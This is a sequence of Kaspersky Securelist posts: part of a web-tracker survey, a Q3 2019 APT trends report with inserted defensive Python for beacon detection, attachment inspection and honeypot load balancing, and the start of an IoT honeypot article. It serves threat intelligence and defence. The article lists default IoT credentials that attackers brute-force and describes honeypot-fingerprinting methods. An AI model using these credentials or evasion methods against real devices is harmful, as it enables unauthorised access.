Besides DoubleClick and Google, in second place we see Adloox, already observed in the Top 10 trackers in North America and Europe. In Oceania, Adloox is most frequently encountered on news.com.au, carsales.com.au, msn.com, gumtree.com.au, metservice.com, and stuff.co.nz.

South Asia

In the South Asia region (Bangladesh, India), the picture is very similar to what we have already seen in North America, Europe, and Oceania: the undisputed tracking leader is again Google with DoubleClick.


Arab world

In the Arab countries (Algeria, Bahrain, Djibouti, Egypt, Iraq, Jordan, Kuwait, Libya, Oman, Qatar, Saudi Arabia, Sudan, Tunisia, UAE, Yemen), Facebook is very popular; it is used for business promotion, communication, shopping, and much else besides. Facebook’s tracker ranks fourth in the Top 25, higher than in other regions.


Latin America

In Latin America (Argentina, Bolivia, Brazil, Chile, Colombia, Dominican Republic, Ecuador, Guatemala, Haiti, Honduras, Mexico, Panama, Peru, Puerto Rico, Uruguay, Venezuela), the picture is similar to the global one. But in this region, alongside Google, DoubleClick, and Facebook, we see ScorecardResearch among the most common names. In Latin America, attempts to collect data using this tracker were most often blocked on uol.com.br, msn.com, twitch.tv, and globo.com.


Africa

The last region where the Top 25 trackers differ little from the overall global picture is Africa. In the Top 10 we see the familiar names, as well as Yahoo Advertising, which is found not only on yahoo.com and other Yahoo pages (for example, mail.yahoo.com), but on other resources too, including msn.com, jumia.co.ke, jumia.com.ng, sbtjapan.com, beforward.jp, quickteller.com, and dailymotion.com.


Asia

The Asia region (China, Hong Kong, Indonesia, Japan, South Korea, Macau, Malaysia, Singapore, Taiwan) is very different from the rest of the world. Looking at the top trackers in the region overall, we see ones from Japanese and Chinese companies in the list. In addition to the names we know, there are many local ones too. Moreover, the tracker ratings for each country in the region differ from each other. As a result, the countries in this region should be considered separately.


China

In China, the trackers most often encountered by our users come from Alibaba, which collects data on user behavior and interests in the group’s own online stores: alibaba.com, aliexpress.com, taobao.com. Since AliExpress is known practically worldwide, Alibaba’s tracker also features in the Top 20 in Azerbaijan, Belarus, China, Hong Kong, Kazakhstan, Libya, Macau, Moldova, Malaysia, Russia, Taiwan, Tajikistan, Uzbekistan, and Yemen. Moreover, its presence was registered in almost all countries where our security solutions are used. In second place is the “Chinese Google” — Baidu.


South Korea

Here, as in most countries with an unfenced Internet, DoubleClick leads the way. That said, the local giant Naver, already known as the “Korean Google,” is catching up. Also in the top list are many local companies, such as Daum Communications (Kakao since 2014) and the advertising platform ADOP Inc.


Japan

The Japanese tracking market is not that much different from the global one, except that the Top 20 includes local firms: MicroAd (marketing), Samurai Factory, i-mobile (advertising platform), and others.


CIS

The CIS (Armenia, Azerbaijan, Belarus, Kazakhstan, Kyrgyzstan, Moldova, Russia, Tajikistan, Uzbekistan) is dominated by the Russian-speaking segment of the Internet, with well-developed online technologies and local Internet giants such as Mail.ru Group and Yandex. But as in most countries around the world, the local leaders are challenged by DoubleClick.


Conclusion

The Internet is a common space for all people of the world. Wherever they are, be it Peru, Djibouti, or Germany, most use the same resources. The degree of distinctiveness and detachment of a given geographical Internet space depends on many factors, for example the development of a country’s Internet technologies, the languages spoken there, and how open or closed government policy and society in general are.

As we saw from the statistics, tech giants that collect and analyze data to show us targeted advertising are present practically everywhere in the world. And it is these companies that store the most data about people from all over the planet.

On the one hand, data collection and analysis means that we are shown content and products of interest to us, and vendors get to improve their offerings based on user experience (UX). But on the other, the idea of all our online actions being harvested and used to supplement a profile that some company has on us is not overly pleasant. To guard against unwanted tracking, you can simply block tracking services from slipping their “beacons” into downloaded content. For this, you need to activate the DNT (Private Browsing) component in Kaspersky products. See the Kaspersky Security Cloud guides for details of how to do so.

October 16, 2019

APT trends report Q3 2019

For more than two years, the Global Research and Analysis Team (GReAT) at Kaspersky has been publishing quarterly summaries of advanced persistent threat (APT) activity. The summaries are based on our threat intelligence research and provide a representative snapshot of what we have published and discussed in greater detail in our private APT reports. They are designed to highlight the significant events and findings that we feel people should be aware of.

This is our latest installment, focusing on activities that we observed during Q3 2019.

Readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact intelreports@kaspersky.com.

The most remarkable findings

On August 30, Ian Beer from Google’s Project Zero team published an extensive analysis of at least 14 iOS zero-days found in the wild and used in five exploitation chains to escalate privileges by an unknown threat actor. Although watering-hole attacks were popular in the early 2010s, they have since become less common. According to Google, a number of waterholed websites were delivering the exploits, possibly as far back as three years ago (based on September 2016 usage of the first exploit chain). While the blog contains no details about the compromised sites or whether they are still active, it states that these websites receive “thousands of visitors per week”. The first-stage WebKit exploit used to infect visitors makes no discrimination other than requiring that the victim uses an iPhone and browses the website with Safari, although the vulnerability would also have worked in other browsers such as Chrome (which on iOS is built on the same WebKit engine). The lack of victim discrimination points to a relatively non-targeted attack, but the modest estimate of the number of visitors to the waterholed sites suggests that the attack was aimed at particular communities: it is likely that the waterholed sites were all dedicated to some common topic. The blog does not contain many details on who is behind the attack, but the technical capability needed to deliver and install this malware, and to keep the exploitation chains up to date for more than two years, shows a high level of resources and dedication. Once installed, the malware is invisible to the victim. It polls its C2 every 60 seconds for new commands, can access all kinds of files on the device, and tracks GPS position. There is no mechanism to survive a reboot, but the ability to steal sign-in cookies for the victim’s accounts can keep providing the attackers with access to that data.

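The 60-second C2 poll described above is the kind of regularity a network defender can hunt for even without a sample of the implant. The following added example (not from the Project Zero write-up or this report) groups connection records by source and destination and flags pairs whose inter-arrival intervals are almost constant. The flow records are constructed, and the thresholds are assumptions to tune against your own baseline.

```python
"""Spot fixed-interval beaconing (the implant above polls its C2 every 60 s)
in connection records. Added example, not from the original report; the flow
records are constructed."""
from collections import defaultdict
from statistics import mean, pstdev


def periodic_pairs(flows, min_events=5, max_cv=0.1):
    """flows: iterable of (timestamp_seconds, src, dst).
    For every (src, dst) with at least min_events connections, compute the
    inter-arrival gaps; a pair is beacon-like when the gaps' coefficient of
    variation (stdev / mean) is at most max_cv. Returns {(src, dst): mean_gap}."""
    times = defaultdict(list)
    for ts, src, dst in flows:
        times[(src, dst)].append(ts)
    hits = {}
    for pair, ts_list in times.items():
        if len(ts_list) < min_events:
            continue
        ts_list.sort()
        gaps = [b - a for a, b in zip(ts_list, ts_list[1:])]
        m = mean(gaps)
        if m <= 0:
            continue
        if pstdev(gaps) / m <= max_cv:
            hits[pair] = round(m, 1)
    return hits


# Constructed flows: one host polls 203.0.113.7 roughly every minute (small
# jitter, as a sleep-based loop shows) and browses 198.51.100.20 at
# human-irregular intervals. Both destinations are documentation addresses.
SAMPLE_FLOWS = [
    (0, "10.0.0.5", "203.0.113.7"), (61, "10.0.0.5", "203.0.113.7"),
    (119, "10.0.0.5", "203.0.113.7"), (181, "10.0.0.5", "203.0.113.7"),
    (240, "10.0.0.5", "203.0.113.7"), (299, "10.0.0.5", "203.0.113.7"),
    (0, "10.0.0.5", "198.51.100.20"), (5, "10.0.0.5", "198.51.100.20"),
    (40, "10.0.0.5", "198.51.100.20"), (41, "10.0.0.5", "198.51.100.20"),
    (300, "10.0.0.5", "198.51.100.20"), (302, "10.0.0.5", "198.51.100.20"),
    (10, "10.0.0.9", "203.0.113.7"), (70, "10.0.0.9", "203.0.113.7"),  # too few
]

if __name__ == "__main__":
    for (src, dst), gap in periodic_pairs(SAMPLE_FLOWS).items():
        print(f"{src} -> {dst}: beacon-like, mean interval {gap}s")
```

Legitimate traffic is periodic too (NTP, update checks, health probes), and an implant that randomises its sleep will push the coefficient of variation above the threshold, so treat the output as leads to enrich with destination reputation rather than as verdicts.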
Shortly after the Google blogpost, Volexity published more details about the waterholing websites used in the attack to distribute the malware, pointing to a “strategic web compromise targeting Uyghurs”. Citizen Lab published the Android counterpart for this story, stating that between November 2018 and May 2019, senior members of Tibetan groups were targeted by the same actor (this time dubbed POISON CARP by Citizen Lab) using malicious links in WhatsApp text exchanges, with the attackers posing as NGO workers, journalists and other fake personas. The links led to code designed to exploit web browser vulnerabilities to install spyware on iOS and Android devices, and in some cases to OAuth phishing pages.

At the beginning of September 2019, Zerodium, a zero-day brokerage firm, indicated that a zero-day for Android is now worth more than one for iOS: the exploit broker is now willing to pay $2.5 million for a zero-click Android zero-day with persistence, a significant increase on the company’s previous payout ceiling of $2 million for remote iOS jailbreaks. By contrast, Zerodium has reduced payouts for Apple one-click exploits. On the same day, a high-severity zero-day was found in the V4L2 (Video4Linux 2) driver, the Android media driver. This vulnerability, which could enable privilege escalation, was not included in Google’s September security update. A few days later, an Android flaw was identified that left more than a billion Samsung, Huawei, LG and Sony smartphones vulnerable to an attack that would allow an attacker to gain full access to emails on a compromised device using an SMS message.

Russian-speaking activity

Turla (aka Venomous Bear, Uroburos and Waterbug) has made significant changes to its toolset. While investigating malicious activity in Central Asia, we identified a new backdoor that we attribute with medium confidence to this APT group. The malware, named Tunnus, is a .NET-based backdoor with the ability to run commands or perform file actions on an infected system and send the results to its C2. So far, the C2 infrastructure has been built on compromised sites with vulnerable WordPress installations. According to our telemetry, Tunnus activity started in March and was still active when we published our private report in July.

Turla has also wrapped its notorious JavaScript KopiLuwak malware in a dropper called Topinambour, a new .NET file that the group uses to distribute and drop KopiLuwak through infected installation packages for legitimate software such as VPNs. Some of the changes are meant to help Turla evade detection. For example, the C2 infrastructure uses IP addresses that appear to mimic ordinary LAN addresses. The malware is almost completely ‘fileless’: the final stage of infection, an encrypted Trojan for remote administration, is embedded in the computer’s registry for the malware to access when ready. Two KopiLuwak analogues, the .NET RocketMan Trojan and the PowerShell MiamiBeach Trojan, are used for cyber-espionage. We think that the threat actor deploys these versions where its targets are protected by security software capable of detecting KopiLuwak. All three implants can fingerprint targets, gather information on the system and network adapters, steal files, and download and execute additional malware. MiamiBeach is also able to take screenshots.

In September, Zebrocy spear-phished multiple NATO and alliance partners throughout Europe, attempting to gain access to email communications, credentials and sensitive documents. This campaign is similar to past Zebrocy activity, with target-relevant content used within emails, and ZIP attachments containing harmless documents alongside executables with altered icons and identical filenames. The group also makes use of remote Word templates pulling contents from the legitimate Dropbox file sharing site. In this campaign, Zebrocy targeted defense and diplomatic targets located throughout Europe and Asia with its Go backdoor and Nimcy variants.
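The attachment tricks above (a document and an executable sharing one name inside a ZIP, executables disguised with document icons, and Word files that fetch a remote template) can all be checked before a message reaches a mailbox. The added example below (not Zebrocy tooling or the report's own code) builds such an attachment in memory and inspects it: it reads file magic rather than trusting extensions or icons, detects stem collisions between documents and executables, and looks inside .docx files for an external attachedTemplate relationship. File names and the template URL are placeholders.

```python
"""Inspect a ZIP e-mail attachment for an executable masquerading next to a
document, a document/executable filename collision, and a .docx that pulls a
remote template. Added example, not from the original report; the attachment
is built in memory with placeholder names."""
import io
import zipfile
import xml.etree.ElementTree as ET
from collections import defaultdict
from urllib.parse import urlsplit

DOC_EXTS = {".doc", ".docx", ".pdf", ".rtf", ".xls", ".xlsx", ".txt"}
EXE_EXTS = {".exe", ".scr", ".com", ".pif"}
TEMPLATE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"


def _stem_ext(name):
    base = name.rsplit("/", 1)[-1]
    if "." in base:
        stem, ext = base.rsplit(".", 1)
        return stem.lower(), "." + ext.lower()
    return base.lower(), ""


def remote_template_urls(docx_bytes):
    """External attachedTemplate targets declared in word/_rels/settings.xml.rels."""
    try:
        with zipfile.ZipFile(io.BytesIO(docx_bytes)) as doc:
            if "word/_rels/settings.xml.rels" not in doc.namelist():
                return []
            root = ET.fromstring(doc.read("word/_rels/settings.xml.rels"))
    except (zipfile.BadZipFile, ET.ParseError):
        return []
    return [rel.get("Target") for rel in root.iter()
            if rel.tag.endswith("}Relationship")
            and rel.get("Type") == TEMPLATE_REL
            and rel.get("TargetMode") == "External"]


def inspect_attachment(zip_bytes):
    """Return (entry, reason) findings for one ZIP attachment."""
    findings = []
    stems = defaultdict(set)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as z:
        for name in z.namelist():
            stem, ext = _stem_ext(name)
            stems[stem].add(ext)
            data = z.read(name)
            if data[:2] == b"MZ":            # PE header, whatever the icon or name says
                findings.append((name, "PE executable"))
                if ext not in EXE_EXTS:
                    findings.append((name, "executable behind non-executable extension"))
            if ext == ".docx":
                for url in remote_template_urls(data):
                    findings.append((name, "remote template from " + (urlsplit(url).hostname or url)))
    for stem, exts in stems.items():
        if exts & DOC_EXTS and exts & EXE_EXTS:
            findings.append((stem, "document and executable share a filename stem"))
    return findings


def build_sample():
    """Constructed attachment: a decoy PDF, an .exe with the same stem, and a
    .docx whose settings relationship fetches a template from a file-sharing
    URL (placeholder path, not a real file)."""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        f'<Relationship Id="rId1" Type="{TEMPLATE_REL}" '
        'Target="https://www.dropbox.com/s/placeholder/template.dotm?dl=1" TargetMode="External"/>'
        '</Relationships>'
    )
    docx = io.BytesIO()
    with zipfile.ZipFile(docx, "w") as d:
        d.writestr("word/document.xml", "<w:document/>")
        d.writestr("word/_rels/settings.xml.rels", rels)
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("Report.pdf", b"%PDF-1.4 decoy")
        z.writestr("Report.exe", b"MZ" + b"\x00" * 62)
        z.writestr("Invitation.docx", docx.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    for entry, reason in inspect_attachment(build_sample()):
        print(f"{entry}: {reason}")
```

The remote-template check is the one most often missed: the document itself can be clean, with the payload arriving only when Word follows the external relationship at open time, so the relationship target is what needs to be reviewed or blocked at the gateway.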

Chinese-speaking activity

HoneyMyte (aka Temp.Hex and Mustang Panda), which has been active for several years, has adopted different techniques to perform its attacks over the past couple of years, and has focused on various targeting profiles. In previous attacks, conducted from mid-2018, this threat actor deployed PlugX implants, as well as multi-stage PowerShell scripts resembling CobaltStrike. That campaign targeted government entities in Myanmar, Mongolia, Ethiopia, Vietnam and Bangladesh. We recently described a new set of activities from HoneyMyte involving attacks that relied on several types of tools. They include: (a) PlugX implants; (b) a multi-stage package resembling the CobaltStrike stager and stageless droppers with PowerShell and VB scripts, .NET executables, cookie-stealers and more; (c) ARP poisoning with DNS hijacking malware, to deliver poisoned Flash and Microsoft updates over HTTP for lateral movement; (d) various system and network utilities. Based on the targeting of government organizations related to natural resource management in Myanmar and a major continental organization in Africa, we assess that one of the main motivations of HoneyMyte is gathering geo-political and economic intelligence. While a military organization was targeted in Bangladesh, it is possible that the individual targets were related to geopolitical activity in the region.

Since the beginning of 2019, we have observed a spike in LuckyMouse activity, both in Central Asia and the Middle East. For these new campaigns, the attackers seem to focus on telecommunications operators, universities and governments. The infection vectors are direct compromise, spear phishing and, possibly, watering holes. LuckyMouse hasn’t changed any of its TTPs (Tactics, Techniques and Procedures), continuing to rely on its own tools to get a foothold in the victim’s network. The new campaigns consist of HTTPBrowser as a first stage, followed by the Soldier Trojan as a second-stage implant. The attackers made a change to their infrastructure, as they seem to solely rely on IPv4 addresses instead of domain names for their C2s, which can be seen as an attempt by them to limit correlation. The campaigns from this actor were still active at the time we published our latest private report on LuckyMouse in September.

Our January 2018 private report ‘ShaggyPanther – Chinese-speaking cluster of activity in APAC’ introduced ShaggyPanther, a previously unseen malware and intrusion set targeting Taiwan and Malaysia. Related components and activity span back over a decade, with similar code carrying compilation timestamps as far back as 2004. Since then, ShaggyPanther activity has been detected in several more locations: the most recent detections occurred on servers in Indonesia in July and, somewhat surprisingly, in Syria in March. The newer 2018 and 2019 backdoor code adds a new layer of obfuscation and no longer contains clear-text C2 strings. Since our original release, we have identified an initial server-side infection vector for this actor: SinoChopper/ChinaChopper, a commonly used webshell shared across multiple Chinese-speaking actors. SinoChopper is used not only for host identification and backdoor delivery but also for email archive theft and additional activity. Though not all incidents can be traced back to server-side exploitation, we did detect a couple of cases and obtained information about their staged install process. In 2019 we observed ShaggyPanther targeting Windows servers.

Middle East

On August 1, Dragos published an overview of attacks called ‘Oil and Gas Threat Perspective Summary’, which references an alleged new threat actor they call Hexane. According to the report, “HEXANE targets oil and gas and telecommunications in Africa, the Middle East, and Southwest Asia”. Dragos claims to have identified the group in May 2019, associating it with OilRig and CHRYSENE. Although no IoCs have been made publicly available, some researchers have shared hashes in a Twitter thread in response to the Dragos announcement. Our analysis reveals some low-confidence similarities with OilRig based on TTPs, which is something that Dragos also mentions in its research. If this is indeed the case, the recent leaks from Lab Dookhtegan and GreenLeakers offer several hypotheses about this group’s emergence. Due to exposure and leaks, OilRig may simply have changed its toolset and continued to operate as usual: this would imply a quick and flexible response to the leaks from this actor. Or perhaps some of the OilRig TTPs were adopted by a new group that seems to have similar interests. Hexane’s activity appears to have started around September 2018 with a second wave of activity starting in May 2019. In all cases, the artefacts used in the attacks are relatively unsophisticated. The constant evolution of the droppers seems to indicate a trial-and-error period where attackers were testing how best to evade detection. The TTPs we can link to previous OilRig activity include the described trial-and-error process, the use of simplistic unsophisticated droppers distributed through spear phishing and DNS-based C2 exfiltration.

TortoiseShell is a new cluster of activities associated with an unknown APT actor, revealed by Symantec on September 18, 2019. Symantec claims that the first signs of activity were seen in July 2018, and are still active one year later; Kaspersky has seen different TortoiseShell artifacts dating back to January 2018. To date, all registered attacks, according to our telemetry, are in Saudi Arabia. Symantec’s report also confirms that the majority of the infections they found were in the same location. The attackers deploy their Syskit backdoor and then use it for reconnaissance. Other tools deployed on the victim machines are designed to collect files and pack them using RAR, gathering further system information. In one case, the attackers deployed the TightVNC remote administration tool to obtain full access to a machine. Symantec mentions traces of OilRig tools in some of the victims, something which we cannot confirm. Also, they mention in their blogpost the possibility that this was distributed through a supply chain attack. We were able to see the malware being distributed through a fake application distributed from a specifically created website for war veterans around two months before the publication of our report. The website was activated shortly after we published our report during a national holiday period in Saudi Arabia. However, we didn’t find any compromised application that could suggest a supply chain attack.

Southeast Asia and the Korean Peninsula

Recently we discovered new Android malware disguised as a mobile messenger or as cryptocurrency-related applications. The new malware has several connections with KONNI, a Windows malware strain that has been used in the past to target a human rights organization and an individual/organization with an interest in Korean Peninsula affairs. KONNI has also previously targeted cryptocurrencies. The infected apps don’t steal cryptocurrencies from a specific trading application or switch wallet addresses; they implement full-featured functionalities to control an infected Android device and steal personal cryptocurrency using these features. We worked closely with a local CERT in order to take down the attacker’s server, giving us a chance to investigate it.

We recently tracked new BlueNoroff activity. In particular, we identified a bank in Myanmar that was compromised by this actor and promptly contacted it to share the IoCs we had found. This collaboration allowed us to obtain valuable information on how the attackers move laterally to access high value hosts, such as those owned by the bank’s system engineers interacting with SWIFT. They use a public login credential dumper and homemade PowerShell scripts for lateral movement. BlueNoroff also employs new malware with an uncommon structure, probably to slow down analysis. Depending on the command line parameters, this malware can run as a passive backdoor, an active backdoor or a tunneling tool; we believe the group runs this tool in different modes depending on the situation. Moreover, we found another type of PowerShell script used by this threat actor when it attacked a target in Turkey. This PowerShell script has similar functionality to those used previously, but BlueNoroff keeps changing it to evade detection.

Kaspersky observed a recent campaign utilizing a piece of malware referred to by FireEye as DADJOKE. This malware was first used in the wild in January 2019 and has undergone constant development since then. We have only observed this malware being used in a small number of active campaigns since January, all targeting government, military, and diplomatic entities in the Southeast Asia region. The latest campaign was conducted on August 29 and seems to have targeted only a select few individuals working for a military organization.

The Andariel APT group, considered to be a sub-group of Lazarus, was initially described by the South Korean Financial Security Institute (FSI) in 2017. This threat actor has traditionally focused on geopolitical espionage and financial intelligence in South Korea. We have released several private intelligence reports on the group. We recently observed new efforts by this actor to build a new C2 infrastructure by targeting vulnerable WebLogic servers, in this case exploiting CVE-2017-10271. Following a successful breach, the attackers implanted malware signed with a legitimate certificate belonging to a South Korean security software vendor. Thanks to the quick response of the South Korean CERT, this certificate was soon revoked. The malware is a brand new type of backdoor, called ApolloZeus, started by a shellcode wrapper with complex configuration data. This backdoor uses a relatively large shellcode in order to make analysis difficult. In addition, it implements a set of features to execute the final payload discreetly. The discovery of this malware allowed us to find several related samples, as well as documents used by the attackers to distribute it, providing us with a better understanding of the campaign. Indeed, we believe this attack is an early preparation stage for a new campaign, which also points to the attacker’s intention to replace its malware framework with the newly discovered artifacts.

Other interesting discoveries

The well-known Shadow Brokers leak Lost in Translation included an interesting Python script –sigs.py – that contained lots of functions to check if a system had already been compromised by another threat actor. Each check is implemented as a function that looks for a unique signature in the system, for example, a file with a unique name or registry path. Although some checks are empty, 44 entries are listed in sigs.py, many of them related to unknown APTs that have not yet been publicly described. In 2018, we identified the APT described as the 27th function of the sigs.py file, which we call DarkUniverse. We assess with medium confidence that DarkUniverse is connected with the ItaDuke set of activity due to unique code overlaps. The main component is a rather simple DLL with only one exported function that implements persistence, malware integrity, communication with the C2 and control over other modules. We found about 20 victims in Western Asia and Northeastern Africa, including medical institutions, atomic energy bodies, military organizations and telecommunications companies.

Since the beginning of 2019, we have observed the operation of new RCS (Remote Control System) implants for Android. RCS uses watermarks for different customers, which allowed us to correlate post-leak activity in the wild to obtain a global picture of how this malware is still being used, including the most recent cases. We detected RCS being used in Ethiopia in February, while additional samples with the same watermark were also detected in Morocco. The deployment method used depends on the actor, but the most common method consists of sending a legitimate backdoored application with RCS directly to the target using IM services (Telegram and WhatsApp).

Final thoughts

In seeking to evade detection, threat actors are refreshing their toolsets. This quarter, we have seen this clearly in Turla’s development of its Tunnus backdoor and Topinambour dropper.

However, when a new campaign is observed, it’s not always immediately clear whether the tools used are the result of an established threat actor revamping its tools or a completely new threat actor making use of the tools developed by an existing APT group. In the case of Hexane, for example, it’s unclear if this is a new development by OilRig, or the use of OilRig TTPs by a new group with similar interests in the Middle East, Africa and Southwest Asia.

Korean-focused APT campaigns continue to dominate activities in Southeast Asia, a trend we first noted in our Q2 report.

Despite the lower payouts by Zerodium for iOS exploits relative to those for Android, it’s clear that mobile exploits continue to fetch very high prices. Our research into the ongoing use of RCS implants for Android and the revelations about the use of multiple iOS zero-days as described by Google and Citizen Lab underline the fact that mobile platforms have now become a standard aspect of APT attacks.

As always, we would note that our reports are the product of our visibility into the threat landscape. However, it needs to be borne in mind that, while we strive to continually improve, there is always the possibility that other sophisticated attacks may fly under our radar.

15 October 2019

IoT: a malware story

Since 2008, cybercriminals have been creating malware to attack IoT devices, such as routers and other types of network equipment. You will find a lot of statistics on this on Securelist. The main problem with these IoT/embedded devices is that one simply cannot install any kind of security software on them. How do we deal with that?

The best option for tracking attacks, catching malware and getting an overview of attacks in this area is to use honeypots.

About honeypots

There are three common types of honeypot:

  • Low-interaction honeypots. These simulate services such as Telnet, SSH and web servers. The attacker or attacking system is tricked into thinking it is dealing with a real vulnerable system and runs its malicious commands and payload.
  • High-interaction honeypots. These are real systems that require additional measures to restrict malicious activity and avoid compromising further systems, but they have the advantage of actually running a fully POSIX-capable system. This means that attempts to identify the host as a honeypot using techniques not emulated by low-interaction honeypots will fail, so the attacking scripts believe they are running on a real device.
  • Medium-interaction honeypots. These are a combination of the two, offering more functionality than low-interaction honeypots but less than high-interaction honeypots.

Ideally, one would operate only high-interaction honeypots. Unfortunately, due to the high volume of attacks, these cannot scale: the environment needs to be reset for every new connection. As such, medium-interaction honeypots are the most commonly used type, and the most popular open-source projects are Cowrie and Dionaea.

We work with all three types of honeypots, and we have even created a different type, the sensor honeypot, which we will cover below.

Honeypot deployment

Working with honeypots implies taking security into consideration at every step. A system vulnerable to attack or a system under attack can put you and others at risk.

A major step when running honeypots is planning the network layout before getting the honeypots running. This includes defining what activities should be monitored, and how data is collected and processed. Over the past few years, we have created a honeypot infrastructure, extending and improving it continuously. We created our own modular approach to deal with system management, updates and data processing. The main idea is to be able to deploy multiple honeypots with ease and keep maintenance costs as low as possible.

Residential vs. “Corporate” IP addresses

Our telemetry data suggests that smart botnet operators check the AS name of the network and tend to target only IP addresses belonging to internet service providers supplying Internet connections to home users. The reason is simple: if a router shows up on an Amazon- or DigitalOcean-owned IP, this might be a sign that the machine is a VPS (virtual private server) rather than a SOHO router sitting in somebody’s home.

Using the same IP address for a long time

Cycling through IP addresses is quite important. Botnet owners try to monitor honeypots on their own, so after some time, public IP addresses may get flagged by cybercriminals, which results in fewer attacks. Furthermore, we believe there are lists of “honeypot IPs” traded in darknet markets.

Fingerprinting honeypots

Several malware families detect honeypots by issuing specific valid commands that some honeypots do not fully emulate. Attackers constantly change these fingerprinting methods to bypass our anti-fingerprinting measures, which detect that a honeypot is being probed and return fake data to make it look real. For example, one malware family reads the contents of /proc/cpuinfo in order to find out the processor type and family; most Cowrie deployments report the same CPU architecture, which is exactly the kind of uniformity such a check exploits.

Handling heavy loads

Exposing a popular port (for example, 21, 22, 23 or 80) to the Internet will almost immediately attract connection attempts from various hosts, and the longer that port stays open, the more bots will try to “infect” the service. For a static IP address running the same service for more than twelve months, the “infection rate” (the number of sessions trying to infect our honeypot host with malware) was around 4,000 every 15 minutes. The offending IPs are not unique: in our experience, one attacker attempts to infect a machine multiple times.

A large number of connections generates a lot of stress on both the network and the honeypot emulation stacks. From our experience, we noticed that Cowrie can handle around 10,000 simultaneous sessions per instance. For heavily-loaded honeypots, the solution would be to load-balance the attacking connections at the kernel layer into multiple Docker instances, which can be easily implemented using the kernel’s netfilter module.
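The paragraph above only names the mechanism (netfilter in front of several Docker instances). The following is an added example, not Kaspersky’s deployment code, of one way to express it: iptables DNAT rules using the `statistic` match in `nth` mode, plus a small model of the nth counters that shows why the `--every` value has to count down from one rule to the next. The container addresses and the assumption that each container listens on the same port are illustrative.

```python
"""Spread connections for one honeypot port across several Docker-hosted
emulator instances with netfilter (added example, not Kaspersky's code).
Backend addresses and the port are assumptions for illustration."""
from ipaddress import ip_address
from typing import List, Sequence


def nth_balance_rules(port: int, backends: Sequence[str], proto: str = "tcp") -> List[str]:
    """Return iptables commands that round-robin new connections on `port`.

    The nat table is consulted only for the first packet of a connection, so
    DNAT here balances whole sessions, not individual packets.
    `-m statistic --mode nth --every N --packet 0` matches every Nth packet
    *that reaches the rule*, and DNAT is terminating, so each later rule only
    sees what earlier rules left over. For equal shares `--every` must count
    down (N, N-1, ..., 2) and the last rule takes the remainder with no
    statistic match at all; repeating the same `--every N` on every rule is a
    common mistake that gives the backends uneven shares.
    """
    if not backends:
        raise ValueError("need at least one backend")
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    for addr in backends:
        ip_address(addr)  # fail early: a typo here would silently blackhole the honeypot
    rules: List[str] = []
    total = len(backends)
    for i, addr in enumerate(backends):
        remaining = total - i
        match = (f"-m statistic --mode nth --every {remaining} --packet 0 "
                 if remaining > 1 else "")
        rules.append(
            f"iptables -t nat -A PREROUTING -p {proto} --dport {port} "
            f"{match}-j DNAT --to-destination {addr}:{port}"
        )
    return rules


def simulate(n_backends: int, connections: int) -> List[int]:
    """Model the per-rule nth counters to show the count-down gives an even split."""
    counters = [0] * n_backends   # one nth counter per statistic rule
    hits = [0] * n_backends
    for _ in range(connections):
        for i in range(n_backends):
            every = n_backends - i
            if every == 1:        # catch-all rule, no statistic match
                hits[i] += 1
                break
            matched = counters[i] % every == 0
            counters[i] += 1      # the counter advances for every packet that reaches the rule
            if matched:
                hits[i] += 1
                break
    return hits


if __name__ == "__main__":
    for rule in nth_balance_rules(23, ["172.18.0.2", "172.18.0.3", "172.18.0.4"]):
        print(rule)
    print(simulate(3, 300))
```

The `simulate` function is there to make the arithmetic visible: with three backends the first rule takes every third connection, the second takes every second connection of what is left, and the catch-all takes the rest, so 300 connections land as 100/100/100.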


So far, we have collected results in our production environment for more than one year. We have deployed more than 50 honeypots around the world, with 20,000 infected sessions every 15 minutes. Below are our results, based on the aggregated data.

Statistics: Telnet

In the first half of 2019, our Telnet honeypots detected a total of more than 105 million attacks originating from 276,000 unique IP addresses. Compare that with 12 million attacks, originating from 69,000 IP addresses, detected in the same period of 2018. We are looking at a steady increase in repeat attacks from the same attacker IP addresses, suggesting increasingly persistent attempts to infect devices already known to the attackers.

While Brazil and China remained the leaders in terms of unique IP addresses that served as the origin of Telnet password brute-forcing attacks in the first half of 2019, China took the lead when compared with 2018 year-on-year, with around 30 percent, whereas Brazil was second with 19 percent. Egypt, Russia and the United States were third, fourth and fifth, respectively.

H1 2018                 H1 2019
Brazil          28%     China           30%
China           14%     Brazil          19%
Japan           11%     Egypt           12%
USA              5%     Russia          11%
Greece           5%     USA              8%
Turkey           4%     Vietnam          4%
Mexico           4%     India            4%
Russia           3%     Greece           4%
South Korea      3%     South Korea      4%
Italy            2%     Japan            4%

Countries that were the sources of Telnet attacks on Kaspersky honeypots (share of unique attacking IP addresses)

Top 10 IoT threat verdicts

It should come as no surprise that most of the positions are occupied by various Mirai modifications: these use exploits, targeting devices that have Telnet turned off. Consider, too, that the malware has been publicly available for a long time, and its code is versatile enough for compiling bots of any level of complexity, for any hardware configuration.


TOP 10 IoT threat verdicts, first half of 2018


TOP 10 IoT threat verdicts, first half of 2019

The statistics were collected from a specially designated group of honeypots that was not touched by the infrastructure changes (no new devices were added), so the statistics relied on the activity of infected devices only. A session stands for a successful password brute-forcing attempt.


An analysis of logs from an isolated group of honeypots points to a steady trend for a year-on-year decrease in attacker IP addresses but an increase in the number of attacks. The number of active infected devices remains high: tens of thousands of devices attempt to spread malware by both brute-forcing passwords and exploiting various vulnerabilities every month.


Unique IP addresses detected as the origin of attacks on the isolated honeypot group, January through June 2018

Statistics: credentials

Especially in the IoT area, Telnet, SSH and web servers are the most commonly exposed services and, therefore, the most attacked ones. For Telnet and SSH we store not only the malicious payloads but also the initial login credentials. Because attackers mainly try default username/password combinations, this data lets us identify which devices they are targeting.

We collected the most widely used username and password combinations for Q3 and Q4 2018 and Q1–Q3 2019; you can find them all in the Appendix. The most common combination by far is “support/support”, followed by “admin/admin”, “default/default” and “root/vizxv”. The first three entries are self-explanatory, but the fourth one is quite interesting: it is the default password of a vulnerable IP camera, as described on Krebs’s blog.
